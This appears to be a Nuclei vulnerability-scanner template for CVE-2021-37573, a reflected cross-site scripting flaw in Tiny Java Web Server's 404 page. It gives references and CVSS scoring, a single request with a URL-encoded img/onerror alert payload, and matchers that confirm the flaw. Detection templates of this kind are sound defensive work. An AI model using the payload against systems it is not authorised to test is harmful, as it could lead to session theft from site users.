id: CVE-2021-37573 info: name: Tiny Java Web Server - Cross-Site Scripting author: geeknik severity: medium description: A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's "404 Page not Found" error page. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://seclists.org/fulldisclosure/2021/Aug/13 - https://nvd.nist.gov/vuln/detail/CVE-2021-37573 - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-042.txt - http://seclists.org/fulldisclosure/2021/Aug/13 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-37573 cwe-id: CWE-79 epss-score: 0.00303 epss-percentile: 0.6643 cpe: cpe:2.3:a:tiny_java_web_server_project:tiny_java_web_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tiny_java_web_server_project product: tiny_java_web_server tags: cve2021,cve,xss,tjws,java,seclists,tiny_java_web_server_project http: - method: GET path: - "{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est" matchers-condition: and matchers: - type: word part: body words: - "

404 test not found

" - type: word part: header words: - text/html - type: status status: - 404 # digest: 4a0a0047304502200d02bd25f5a56056102138ea11b83ee440541742c76357d974da4884fdcbc34102210080c7e938718205a6a685705a71680e24edd3526d70206396e6dc9273c1e08593:922c64590222798bb761d5b6d8e72950